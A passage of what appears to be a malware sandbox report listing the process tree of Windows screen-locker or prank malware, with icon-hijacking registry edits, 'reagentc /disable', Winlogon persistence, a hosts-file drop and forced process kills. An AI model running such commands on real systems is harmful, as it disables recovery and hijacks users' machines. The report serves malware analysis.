        12⤵
        
        PID:2788
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 133 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5620
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 134 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5576
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 135 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:952
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 136 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5992
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 137 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4312
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 138 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5352
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 139 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:1348
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 140 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:6084
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 141 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3052
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 142 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5820
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 143 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:1032
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 144 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:3504
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 145 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:4100
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 146 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5656
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 147 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        Modifies File Icons
        
        PID:2824
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 148 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5624
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 149 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5616
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 150 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
        12⤵
        
        PID:5288
        
        C:\java\protection\start\starticons.exe
        
        C:\java\protection\start\starticons.exe
        8⤵
        
        PID:2948
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2BBE.tmp\2BBF.tmp\2BC0.bat C:\java\protection\start\starticons.exe"
        9⤵
        
        PID:2036
        
        C:\java\protection\icons.exe
        
        C:\java\protection\icons.exe
        10⤵
        
        PID:5148
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2DB2.tmp\2DB3.tmp\2DB4.bat C:\java\protection\icons.exe"
        11⤵
        
        PID:5912
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:5284
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        Modifies system executable filetype association
        
        PID:2788
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        Modifies registry class
        
        PID:5788
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\batfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        Modifies system executable filetype association
        
        PID:3096
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\blendfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:5520
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\dllfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:3380
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\AutoHotkeyScript\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:2792
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\pngfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:5040
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\jpegfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        
        PID:5536
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\giffile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:5040
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\bittorrent\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:5508
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\cmdfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:2788
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\dbfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:4132
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Drive\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:3504
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\DVD\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:5196
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\docxfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        
        PID:5796
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\htmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        Modifies registry class
        
        PID:5372
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\http\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        
        PID:2300
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\mhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        
        PID:5520
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Folder\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        
        PID:4576
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\https\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        
        PID:380
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\icofile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        
        PID:5432
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\inifile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        Modifies registry class
        
        PID:5236
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\mscfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        Modifies registry class
        
        PID:4624
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\ms-excel\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:1632
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\ms-publisher\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:312
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\ms-word\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:484
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\ms-access\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:2788
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\MSInfoFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        Modifies registry class
        
        PID:5172
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Python.File\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        
        PID:5124
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\regfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:5280
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\steamlink\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        
        PID:2948
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\steam\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\4.ico" /f
        12⤵
        
        PID:1348
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\svgfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        
        PID:3504
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\themefile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        Modifies registry class
        
        PID:2376
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\themepackfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        Modifies registry class
        
        PID:3996
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\VBSFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        
        PID:5704
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\xmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        
        PID:5536
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\WinRAR\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        
        PID:644
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Windows.VhdFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        
        PID:5564
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\SearchFolder\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        Modifies registry class
        
        PID:4644
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Paint.Picture\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\6.ico" /f
        12⤵
        Modifies registry class
        
        PID:3932
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\mhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:4908
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\inffile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        
        PID:4012
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\JSFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        Modifies registry class
        
        PID:3984
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\JSEFile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        
        PID:3116
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\ftp\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:2756
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Word.Document.8\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:2104
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Word.Document.12\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:5540
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Word.RTF.8\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:5668
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\wordhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:4724
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\wordhtmltemplate\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        
        PID:312
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\wordmhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:4132
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\Wordpad.Document.1\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:5172
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\wordxmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
        12⤵
        Modifies registry class
        
        PID:952
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_CLASSES_ROOT\uTorrent\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
        12⤵
        
        PID:4576
        
        C:\Windows\system32\ie4uinit.exe
        
        ie4uinit.exe -show
        12⤵
        Modifies Installed Components in the registry
        Modifies Internet Explorer settings
        Modifies registry class
        
        PID:2176
        
        C:\Windows\system32\ie4uinit.exe
        
        ie4uinit.exe -show
        8⤵
        Modifies Installed Components in the registry
        Modifies Internet Explorer settings
        
        PID:5708
        
        C:\java\protection\start\starthosts.exe
        
        C:\java\protection\start\starthosts.exe
        8⤵
        
        PID:5520
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2E10.tmp\2E11.tmp\2E12.bat C:\java\protection\start\starthosts.exe"
        9⤵
        
        PID:2972
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:6032
        
        C:\java\ban\hosts.exe
        
        C:\java\ban\hosts.exe
        10⤵
        
        PID:5360
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2FC5.tmp\2FC6.tmp\2FC7.bat C:\java\ban\hosts.exe"
        11⤵
        Drops file in Drivers directory
        
        PID:3800
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:4728
        
        C:\java\protection\start\startWPChanger.exe
        
        C:\java\protection\start\startWPChanger.exe
        8⤵
        
        PID:3128
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2E11.tmp\2E11.tmp\2E12.bat C:\java\protection\start\startWPChanger.exe"
        9⤵
        
        PID:5608
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:5444
        
        C:\java\Wallpaper\WPChanger.exe
        
        C:\java\Wallpaper\WPChanger.exe C:\java\Wallpaper\clown.png
        10⤵
        Sets desktop wallpaper using registry
        Modifies Control Panel
        
        PID:2948
        
        C:\java\clown.exe
        
        C:\java\clown.exe
        8⤵
        
        PID:5636
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2E6E.tmp\2E6F.tmp\2E70.bat C:\java\clown.exe"
        9⤵
        
        PID:5880
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:1328
        
        C:\java\protection\start\startvol.exe
        
        C:\java\protection\start\startvol.exe
        10⤵
        
        PID:288
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2FF4.tmp\2FF5.tmp\2FF6.bat C:\java\protection\start\startvol.exe"
        11⤵
        
        PID:3504
        
        C:\java\vol.exe
        
        C:\java\vol.exe
        12⤵
        
        PID:1996
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3812.tmp\3813.tmp\3814.bat C:\java\vol.exe"
        13⤵
        
        PID:5412
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:5780
        
        C:\Windows\system32\wscript.exe
        
        wscript.exe "C:\java\vol.vbs"
        14⤵
        
        PID:2240
        
        C:\Windows\system32\wscript.exe
        
        wscript.exe "C:\java\morgalka.vbs"
        14⤵
        
        PID:6132
        
        C:\java\protection\start\startScreenBlocker.exe
        
        C:\java\protection\start\startScreenBlocker.exe
        10⤵
        
        PID:4264
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3052.tmp\3053.tmp\3054.bat C:\java\protection\start\startScreenBlocker.exe"
        11⤵
        
        PID:5320
        
        C:\java\ban\ScreenBlocker.exe
        
        C:\java\ban\ScreenBlocker.exe
        12⤵
        
        PID:5788
        
        C:\java\protection\start\startcur.exe
        
        C:\java\protection\start\startcur.exe
        10⤵
        
        PID:5676
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3033.tmp\3034.tmp\3035.bat C:\java\protection\start\startcur.exe"
        11⤵
        
        PID:2684
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:5400
        
        C:\java\ban\cur.exe
        
        C:\java\ban\cur.exe
        12⤵
        
        PID:4724
        
        C:\java\attention.exe
        
        C:\java\attention.exe
        10⤵
        
        PID:5180
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3042.tmp\3043.tmp\3044.bat C:\java\attention.exe"
        11⤵
        
        PID:1788
        
        C:\java\form.exe
        
        C:\java\form.exe
        12⤵
        
        PID:5032
        
        C:\Windows\system32\timeout.exe
        
        timeout -t 10 -nobreak
        12⤵
        Delays execution with timeout.exe
        
        PID:5468
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im form.exe
        12⤵
        Kills process with taskkill
        
        PID:5332
        
        C:\Windows\system32\ReAgentc.exe
        
        reagentc /disable
        10⤵
        Drops file in Windows directory
        
        PID:2412
        
        C:\java\protection\start\startWinlog.exe
        
        C:\java\protection\start\startWinlog.exe
        10⤵
        
        PID:5364
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\339E.tmp\339F.tmp\33A0.bat C:\java\protection\start\startWinlog.exe"
        11⤵
        
        PID:5000
        
        C:\java\protection\Winlog.exe
        
        C:\java\protection\Winlog.exe
        12⤵
        Modifies WinLogon for persistence
        
        PID:5688
        
        C:\java\protection\start\startf.exe
        
        C:\java\protection\start\startf.exe
        10⤵
        
        PID:4752
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\366D.tmp\366E.tmp\366F.bat C:\java\protection\start\startf.exe"
        11⤵
        
        PID:6128
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:5744
        
        C:\java\f\f.exe
        
        C:\java\f\f.exe
        12⤵
        
        PID:4724
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3C0A.tmp\3C0B.tmp\3C0C.bat C:\java\f\f.exe"
        13⤵
        
        PID:5540
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:1600
        
        C:\java\protection\start\startban.exe
        
        C:\java\protection\start\startban.exe
        10⤵
        
        PID:5164
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\36BB.tmp\36BC.tmp\36BD.bat C:\java\protection\start\startban.exe"
        11⤵
        
        PID:5704
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:6004
        
        C:\java\ban\ban.exe
        
        C:\java\ban\ban.exe
        12⤵
        
        PID:1428
        
        C:\java\ban\ban.exe
        
        C:\java\ban\ban.exe
        13⤵
        Loads dropped DLL
        
        PID:288
        
        C:\java\Wallpaper\engine\wp.exe
        
        wp id
        10⤵
        
        PID:2284
        
        C:\java\Wallpaper\engine\wp.exe
        
        wp run mpv --wid=131778 C:\java\Wallpaper\engine\wallpapers\1.mp4 --loop=inf --player-operation-mode=pseudo-gui --force-window=yes
        10⤵
        
        PID:3984
        
        C:\java\Wallpaper\engine\mpv.com
        
        "C:\java\Wallpaper\engine\mpv.com" "--wid=131778" "C:\java\Wallpaper\engine\wallpapers\1.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"
        11⤵
        
        PID:6008
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:3096
        
        C:\java\Wallpaper\engine\mpv.exe
        
        "C:\java\Wallpaper\engine\mpv.com" "--wid=131778" "C:\java\Wallpaper\engine\wallpapers\1.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"
        12⤵
        Suspicious use of FindShellTrayWindow
        
        PID:2240
        
        C:\java\hide.exe
        
        C:\java\hide.exe
        10⤵
        Suspicious use of FindShellTrayWindow
        
        PID:3268
        
        C:\Windows\system32\timeout.exe
        
        timeout -t 20 -nobreak
        10⤵
        Delays execution with timeout.exe
        
        PID:5960
        
        C:\java\hide.exe
        
        C:\java\hide.exe
        10⤵
        Suspicious use of FindShellTrayWindow
        
        PID:4992
        
        C:\Windows\system32\timeout.exe
        
        timeout -t 20 -nobreak
        10⤵
        Delays execution with timeout.exe
        
        PID:3744
        
        C:\java\hide.exe
        
        C:\java\hide.exe
        10⤵
        Suspicious use of FindShellTrayWindow
        
        PID:1632
        
        C:\Windows\system32\timeout.exe
        
        timeout -t 20 -nobreak
        10⤵
        Delays execution with timeout.exe
        
        PID:5820
        
        C:\java\hide.exe
        
        C:\java\hide.exe
        10⤵
        Suspicious use of FindShellTrayWindow
        
        PID:3712
        
        C:\Windows\system32\timeout.exe
        
        timeout -t 13 -nobreak
        10⤵
        Delays execution with timeout.exe
        
        PID:3000
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im mpv.exe
        10⤵
        Kills process with taskkill
        
        PID:5048
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im mpv.com
        10⤵
        Kills process with taskkill
        
        PID:5496
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im mpv.exe
        10⤵
        Kills process with taskkill
        
        PID:672
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im mpv.com
        10⤵
        Kills process with taskkill
        
        PID:3304
        
        C:\java\video\VideoPlayer.exe
        
        C:\java\video\VideoPlayer.exe C:\java\video\1.mp4
        10⤵
        Loads dropped DLL
        Enumerates connected drives
        Modifies registry class
        
        PID:1300
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM VideoPlayer.exe
        10⤵
        Kills process with taskkill
        
        PID:6032
        
        C:\java\Wallpaper\engine\wp.exe
        
        wp id
        10⤵
        
        PID:5276
        
        C:\java\Wallpaper\engine\wp.exe
        
        wp run mpv --wid=131778 C:\java\Wallpaper\engine\wallpapers\2.mp4 --loop=inf --player-operation-mode=pseudo-gui --force-window=yes
        10⤵
        
        PID:3480
        
        C:\java\Wallpaper\engine\mpv.com
        
        "C:\java\Wallpaper\engine\mpv.com" "--wid=131778" "C:\java\Wallpaper\engine\wallpapers\2.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"
        11⤵
        
        PID:1112
        
        C:\java\Wallpaper\engine\mpv.exe
        
        "C:\java\Wallpaper\engine\mpv.com" "--wid=131778" "C:\java\Wallpaper\engine\wallpapers\2.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"
        12⤵
        Suspicious use of FindShellTrayWindow
        
        PID:4828
        
        C:\java\hide.exe
        
        C:\java\hide.exe
        10⤵
        Suspicious use of FindShellTrayWindow
        
        PID:5612
        
        C:\Windows\system32\timeout.exe
        
        timeout -t 22 -nobreak
        10⤵
        Delays execution with timeout.exe
        
        PID:5828
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im mpv.exe
        10⤵
        Kills process with taskkill
        
        PID:4312
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im mpv.com
        10⤵
        Kills process with taskkill
        
        PID:1612
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im mpv.exe
        10⤵
        Kills process with taskkill
        
        PID:5232
        
        C:\Windows\system32\taskkill.exe
        
        taskkill -f -im mpv.com
        10⤵
        Kills process with taskkill
        
        PID:1928
        
        C:\java\video\VideoPlayer.exe
        
        C:\java\video\VideoPlayer.exe C:\java\video\2.mp4
        10⤵
        Loads dropped DLL
        Enumerates connected drives
        Modifies registry class
        
        PID:5072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
